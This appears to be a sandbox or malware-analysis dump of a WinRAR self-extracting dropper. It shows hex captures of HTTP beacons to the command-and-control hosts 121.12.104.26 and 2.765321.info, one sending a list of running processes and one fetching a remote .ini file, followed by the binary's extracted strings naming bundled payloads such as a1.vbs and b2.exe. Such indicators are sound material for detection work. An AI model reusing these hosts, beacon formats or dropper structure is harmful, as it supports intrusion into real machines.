0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a313b 20535631 3b202e4e   ve....1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a6e 642e3c2f 703e0a20   ive....nd.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
(&A)
about:blank
ASKNEXTVOL
</b> 
 <b>
(&B)...
<br><br> <lI>
b<style>body{font-family:"Arial,
(&C)
(&D)
(&E):
";font-size:12;}</style><ul><li>
GETPASSWORD1
hmsctls_progress32
(&L)
</lI>
</li><br><br>)<li>
LICENSEDLG	RENAMEDLG
</lI></ul>
(&N)
(&R)
REPLACEFILEDLG
 %s 
"%s"
 %s CRC 
%s CRC 
Shell.Explorer
STARTDLG
(&W)...
 Windows 
WinRAR 
(&Y)
?*<>|"
08_e|F
 (08@P`p
0AGhi&
{0*{*bG
0H V1v
0JC*CJb
0J?`W)
0oZi^t
0y-]t|
106.exe
1111.exe
$17FPP8
.1DnZs
1gbAvB
1Pxych[64
1p'z!X
1~:Y34
2[Cy>P
2E!6h"
>	2qO O
&31/@m
_32Bpr
33!D	3
3k<_G#
3qDyQ{
(3sW2[
$4L"tc
4Y_cOW
4Y_cOW	
!4yiWO
4]yupko
5'@~ +
5 5bw\
5B%z^{
{.5<i 
5z)Pcb
{6RqAC
6vx=_^
]7a?tt
7VdmG9-
=7.Yxh
80zo<'l2
:8@am+
"=8}F|/
(8L.v|vJ
8r22b@
8$RlXk5
8]st!hx$A
8;vo]`
=94l|;0
9}b9K[vD}
9j\o|e
9#N"lM
~9O+T&
9}rv]Qf
"9*W)"9&_#e"
a1.vbs
ad005.exe
AdjustTokenPrivileges
ADVAPI32.dll
%A|--g
AG99$q6
Ag-L*~
.ahKF1
AHOw1+%
  </application>
  <application>
aSaZaba
ASKNEXTVOL
</asmv3:application>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
  </asmv3:windowsSettings>
  <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
</assembly>
<assemblyIdentity
    <assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
a|~ub%
~@au*u
}^A$wW;
AxTw;z@?v
a	yB3p
B0G0J0T0w
b2.exe
+b^2Yd
`B}+4o
bad allocation
bF&&.Q
BFRbnz
@b	gck(W
=bGE	H
=[b:HaP
 bI:cO
=btq1r
+c{["0
C6j[G;+
c8VuTg=6}
ceQ&^	gdk
c=-f`U
CharToOemA
CharToOemBuffA
CharUpperA
)Ck%W8
CloseHandle
CLSIDFromString
CmNFf=-
CMT	UT
CoCreateInstance
COMCTL32.dll
COMCTL32.DLL
COMDLG32.dll
CommDlgExtendedError
CompareStringA
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CopyRect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDirectoryA
CreateDirectoryW
CreateFileA
CreateFileW
CreateStreamOnHGlobal
CreateWindowExA
cs)cG]'
CyC|CY
:}C/Zh,
D,7$}H_
@.data
[&d*:c
DDDDDD
DDDDDDDDD@
DDDDDDDDDDDDDD
DDDDDDDDDGpw
DefWindowProcA
Delete
DeleteDC
DeleteFileA
DeleteFileW
DeleteObject
</dependency>
<dependency>
  </dependentAssembly>
  <dependentAssembly>
<description>WinRAR SFX module</description>
DestroyIcon
DestroyWindow
d.fMQXz
D<hF!g
DhSj}%
DialogBoxParamA
DispatchMessageA
DosDateTimeToFileTime
d+"[ph
    <dpiAware>true</dpiAware>
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
d#sOn1
D}${U$V
E3$"yG
E6$0ddZ*|
e6)t~Rr08
=E_A.j
e_CBaA
EE3]fz
#?,EE6
;EE+c-
EH(!Bo
)|e(~iG
_+e"^l-
-el -s2 "-d%s" "-p%s" "-sp%s"
EnableWindow
EndDialog
Eo9nPO
=)eoli
E'R;[+Q
Erq<2O
e%{SaU
EvBG.8St
e+vh?E
%E_vS^
EWmmII#
E@XE;v
ExitProcess
ExpandEnvironmentStringsA
;e.y*1 %
|~+E"z=
Ezfc'H
~|f}`_
F2LjgA
%f3B^$
F66@ga
F(7[~2
{F8cfr
fbc:N:
F[cw{]M
fc;X78
FFF))EE	FFFF))))))
F,;F$s7
.)FgA~	Z
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindNextFileW
FindResourceA
FindWindowExA
;]fiub<
F%K%S~PPp)	
*FN!Bx8
^&fnG!qk
FreeLibrary
;F$s6;F
FU/cSzH
fvW{SJ
FW,(y:z
@!G(&+
g33WwQ
g5C,A#
#g5w)w
]G9kaUoe\J
@g;a.c
GDI32.dll
gE2(F `+
,GEdAZ
?`@geS
GetClassNameA
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetDateFormatA
GetDeviceCaps
GetDlgItem
GetDlgItemTextA
GetFileAttributesA
GetFileAttributesW
GetFileType
GetFullPathNameA
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNumberFormatA
GetObjectA
GetOpenFileNameA
GetParent
GETPASSWORD1
GetProcAddress
GetProcessHeap
GetSaveFileNameA
GetStdHandle
GetSysColor
GetSystemMetrics
GetSystemTime
GetTempPathA
GetTickCount
GetTimeFormatA
GetVersionExA
GetWindow
GetWindowLongA
GetWindowRect
GetWindowTextA
gkX4Mj
(g>)-L
GlobalAlloc
}g;oG]
Go q37
G`Ulc?
G{W|bU
gwS3	3
gwS37%w`	
gxIGU	
&GZJ$x
$H2	CV
"h9R"%
<head><meta http-equiv="content-type" content="text/html; charset=
HeapAlloc
HeapFree
HeapReAlloc
Hfym.N
/+-H@n-r
hR&Mav
h}]~RU`N
HtEHt7
HtFHt8Ht*Ht
HtgHt=
Ht^Ht:HtQHu'
</html>
<html>
h{Ud+?
$=H\`VB
hvvVs[
HXD@T	
H%+x}t
I=bW-r
IFIHQK
IFR4\VTm
I_HN?54t
]_I/NQ
Install
 io#gfU
IPlE5l
i#pRyhm
$iqjTq
IsDBCSLeadByte
IsWindow
IsWindowVisible
iVnv@ks*
iwVt:EN%
IyP)LqU
iYZY+a
I_ZJ^"
jax$?[u
j;b:{s:
jg}f]?
JJC(c-_
J&l'p{
jNq;)3
[j>S.Xz
jt"Ht'Ht
_$^~Ju
+jUJ(q
JWH>+81u}Z
JXe0FOu
j?xzMU
j Y+L$
jYlG|]
k0@J	|/
( K8@K
=,KA`Uj
_ KCZV
KERNEL32.dll
KK \XS
K=)]O<F
KoZX4sT*@&
Kvr}xl
kv.Zct
K=W6dv[
k~whB*
kXnEk;
/KYKaJ
ky.Te,
$l2O\B
L{4\8-
l5vxLBs|
L8^Da/
L8G96g
      language="*"/>
License
LICENSEDLG
lLC2|kBl
ll~r;2D7
lL?#V\
^-LmD@4
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
LocalFileTimeToFileTime
LookupPrivilegeValueA
@Lo&-sj#
)/LPa]
lstrcmpiA
lstrlenA
)"~lu9;
lV%[f,'
-;Lz9/
M5@u`q
Man5q}
MapWindowPoints
m[B&FfDyTp)
mbZ4aB
~M?D	{
MessageBoxA
*messages***
(m"Ghl
mkCIeV
Ml^81U)yz
m/.n@cm
Mn=R.p
M,NUN[N|N
MoveFileA
MoveFileExA
mqIrWz){/#
m?rux{
Mtp/*4x
;|Mu7u-|
MultiByteToWideChar
{m:W>I
&M'w.w
MZrpYc
)n>&4c
N4Y_cOW
n58;@.
n6c-#2
""n6xMP
'	n$%9w
n	aAK  	p.'
NAh"g]
      name="Microsoft.Windows.Common-Controls"
  name="WinRAR SFX"
&nbsp;
nD=xcOT
NGetProcAddress
N!};i,
nJc	VHt
nQ#H2/
nRv\2b
N:s`C)
{=nuA*
)NuBmZmwc
-N<V@%
_Nx;?l
O`1BW{U
$\oA:xqTEO
 OBu*{
,O\cidBo
OemToCharA
OemToCharBuffA
O_}E:.P_
`O/f&Tnx
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
oMj/RC
OpenProcessToken
oq=*6#
o:QV}Po
OU~p R
Overwrite
&>'OVJM
OXr1D{)
o-Y1ia
p1e"Dtrk
P@3,P#
P*8)qot
P9]pu4
P9]pu6
p9u <:
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PA<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
{P)A.+Y
:pb.Dt
Pc#@~f
PeekMessageA
penc-N
pIr1*x
pJ%<+uZ
]PN`#Qa
PostMessageA
Presetup
      processorArchitecture="*"
  processorArchitecture="*"
ProgramFilesDir
      publicKeyToken="6595b64144ccf1df"
pV}kl4
~P~:)Y
)(PyEH\
Q7:I"q
*q[b$\
QF*p  
QQSVWh
QyJDp3x
qzie(UK[
r0GXs}
R2{UfJ
]R*8cf
rA"mHp
__rar_
RarHtmlClassName
RarSFX
rD#5VL
`.rdata
RD,~fz
ReadFile
RegCloseKey
RegCreateKeyExA
RegisterClassExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RENAMEDLG
REPLACEFILEDLG
      <requestedExecutionLevel level="asInvoker"            
    </requestedPrivileges>
    <requestedPrivileges>
riched20.dll
riched32.dll
RichEdit
rjk|a1
%RL/10qs
RMB2RU
@.rsrc
rtmp%d
S//55??GG
/~s5.Z
s8<"u%
SavePath
`sCC)O
%.*s(%d)%s
%s.%d.tmp
SE8d2' 
  </security>
  <security>
SelectObject
SendDlgItemMessageA
SendMessageA
SeRestorePrivilege
SeSecurityPrivilege
SetCurrentDirectoryA
SetDlgItemTextA
SetEndOfFile
SetEnvironmentVariableA
SetFileAttributesA
SetFileAttributesW
SetFilePointer
SetFileSecurityA
SetFileSecurityW
SetFileTime
SetFocus
SetLastError
SetMenu
SetWindowLongA
SetWindowPos
SetWindowTextA
sfxcmd
sfxname
(*+s^G
s)G*;`O
SHAutoComplete
SHBrowseForFolderA
SHChangeNotify
SHELL32.dll
ShellExecuteExA
SHFileOperationA
SHGetFileInfoA
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHl*Pv
shlwapi.dll
Shortcut
ShowWindow
Silent
;slhrN
s/m#2$G
small.exe
Software\Microsoft\Windows\CurrentVersion
Software\WinRAR SFX
'SPN@%e-?
sqbsf#
%s%s%d
SSh,'A
!Ss*Mv
%s %s %s
SSSh$&A
STARTDLG
STATIC
StretchBlt
St{Rn0{ *
</style>
<style>
<style>body{font-family:"Arial";font-size:12;}</style>
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
(SVWj 
SVWj@3
@SVWjg
SWj<_W3
swWH8,y{S
SystemTimeToFileTime
^\^t^~^
t0h,%A
t0]H:hE\2i
t4SSVW
t>*$9_
t	AA@f
Tb?:1q
< tD<	t@
TDTTTF+
TempMode
t	FAA;t$
T_Fc~$
#tg5cLY
    <!--The ID below indicates application support for Windows 7 -->
    <!--The ID below indicates application support for Windows Vista -->
!This program cannot be run in DOS mode.
t*j\@P
__tmp_rar_sfx_access_check_%u
}t:ql|
[t'QXQ
TranslateMessage
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
t<SSSS
<*t!<?t
TXapo`|
&T!y*N
      type="win32"
  type="win32"/>
%;?U3+
(<\u$8F
u9TF#^Q
u:="cnBs
-ud<!y
uE[X~v
ufh|(A
-U(hG\H
      uiAccess="false"/>
u!,\	m 
uMh<#A
un?M[F
Update
UpdateWindow
USER32.dll
utf-8"></head>
]utP;O2
uZZr'cG-
V1M	o;
v>3Gr2
V3qi-N
	v9(g?g4*D
VB*HEpNl
V|BYmx
~VDLqO
  version="1.0.0.0"
      version="6.0.0.0"
VgyJ;W
vkk;{6
V%+m p
v	N+D$
VN,IEe
?vNj@_+
vP7nA"
vsmizy\g
V&t-!s
 Vu{!|8/w
$=|`W	
"W3pzjwZw0t0zb,Q
w5SSSS
WaitForInputIdle
WaitForSingleObject
W?ej_=
=-/wH4
wHJkyZ'
(.wHUQ`
WideCharToMultiByte
WINRAR.SFX
WJ,qP*
w`{jz]
;W=%K1
W.\'kq
WnWl\T
Wpx&z6
WriteFile
wsprintfA
WSSSSh
wTC!IT"
w]Td^^
(wtLF(n
wvsprintfA
Wwgu"'P
WWknj9
WwR"'P
WwS7'u
wwwwww
wwwwwwwwwwwwww
W}y#O.~Z
;-x5W`
xA<0`o
~xcu('
.Xf7c9X/
xH1334
=xI1OL-
xKf_vH
+Xm mlC-
&xUF	P
_xVsvg7tl
]%XX'#0bd
y92s8V
Yc}[Rqv[
YlR=5?
\:$Y'M
YNANRC
Y<p8U1
"\y>-]r[
yu2!9W >
	]Y&V"
Y"WE|%
yX(40.
yy<P^Q
Z2fQ`InitCommonControlsEx
Z2%PG~pT
*-Z3|g
<z<!A9
ZFX5m=
(ZkN17
z_<>`L
Z;Rf'C
z	s]|!'
zx*8g<Cn
^(+z)y#RFR4